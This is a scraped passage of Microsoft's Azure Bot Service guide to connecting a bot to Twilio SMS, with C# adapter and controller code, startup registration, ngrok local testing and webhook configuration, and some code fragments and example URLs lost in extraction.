On the next page, click the Get your first Twilio number button. A pop-up window will show you a new number, which you can accept by clicking Choose this number (alternatively you can search for a different number by following the on screen instructions). Once you have chosen your number, make a note of it, as you will need this when configuring your bot application in a later step. Wiring up the Twilio adapter in your bot Now that you have your Twilio number and account credentials, you need to configure your bot application. Install the Twilio adapter NuGet package Add the Microsoft.Bot.Builder.Adapters.Twilio NuGet package. For more information on using NuGet, see Install and manage packages in Visual Studio. Create a Twilio adapter class Create a new class that inherits from the TwilioAdapter class. This class will act as our adapter for the Twilio channel and include error handling capabilities (similar to the BotFrameworkAdapterWithErrorHandler class already in the sample, used for handling other requests from Azure Bot Service). public class TwilioAdapterWithErrorHandler : TwilioAdapter { public Twilio Twilio requests Create a new controller which will handle requests from Twilio, on a new endpoing 'api/twilio' instead of the default 'api/messages' used for requests from Azure Bot Service Channels. By adding an additional endpoint to your bot, you can accept requests from Bot Service channels, as well as from Twilio, using the same bot. [Route("api/twilio")] [ApiController] public class TwilioController : ControllerBase { private readonly TwilioAdapter _adapter; private readonly IBot _bot; public TwilioController(TwilioAdapter adapter, IBot bot) { _adapter = adapter; _bot = bot; } [HttpPost] [HttpGet] public async Task PostAsync() { // Delegate the processing of the HTTP POST to the adapter. // The adapter will invoke the bot. await _adapter.ProcessAsync(Request, Response, _bot, default); } } Inject the Twilio adapter in your bot startup.cs Add the following line to the ConfigureServices method within your startup.cs file. This will register your Twilio adapter and make it available for your new controller class. The configuration settings you added in the previous step will be automatically used by the adapter. services.AddSingleton<TwilioAdapter, TwilioAdapterWithErrorHandler>(); Once added, your ConfigureServices method shold Twilio Adapter services.AddSingleton<TwilioAdapter, TwilioAdapterWithErrorHandler>(); // Create the bot as a transient. In this case the ASP Controller is expecting an IBot. services.AddTransient<IBot, EchoBot>(); } Obtain a URL for your bot Now that you have wired up the adapter in your bot project, you need to identify the correct endpoint to provide to Twilio in order to ensure your bot receives messages. You also require this URL to complete configuration of your bot application. To complete this step, deploy your bot to Azure and make a note of the URL of your deployed bot. Note If you are not ready to deploy your bot to Azure, or wish to debug your bot when using the Twilio assumes your local bot is running on port 3978, alter the port numbers in the command if your bot is not). ngrok.exe http 3978 -host-header="localhost:3978" Add Twilio app settings to your bot's configuration file Add the settings shown below to your appSettings.json file in your bot project. You populate TwilioNumber, TwilioAccountSid and TwilioAuthToken using the values you gathered when creating your Twilio number. TwilioValidationUrl should be your bot's URL, plus the api/twilio endpoint you specified in your newly created controller. For example,. "TwilioNumber": "", "TwilioAccountSid": "", "TwilioAuthToken": "", "TwilioValidationUrl", "" Once you have populated the settings above, you should redeploy (or restart if running locally with ngrok) your bot. Complete configuration of your Twilio number The final step is to configure your new Twilio number's messaging endpoint, to ensure your bot receives messages. Navigate to the Twilio Active Numbers page. Click the phone number you created in the earlier step. Within the Messaging section, complete the A MESSAGE COMES IN section by chooisng Webhook from the drop down and populating the text box with your bot's endpoint that you used to populate the TwilioValidationUrl setting in the previous step, such as. - Click the Save button. Test your bot with adapter in Twilio You can now test whether your bot is connected to Twilio correctly by sending an SMS message to your Twilio number. Once the message is received by your bot it will send a message back to you, echoing the text from your message. You can also test this feature using the sample bot for the Twilio adapter by populating the appSettings.json with the same values described in the steps above.
https://docs.microsoft.com/en-us/azure/bot-service/bot-service-channel-connect-twilio?WT.mc_id=mediumsombot-blog-chcondon&view=azure-bot-service-4.0
CC-MAIN-2020-50
refinedweb
1,208
62.88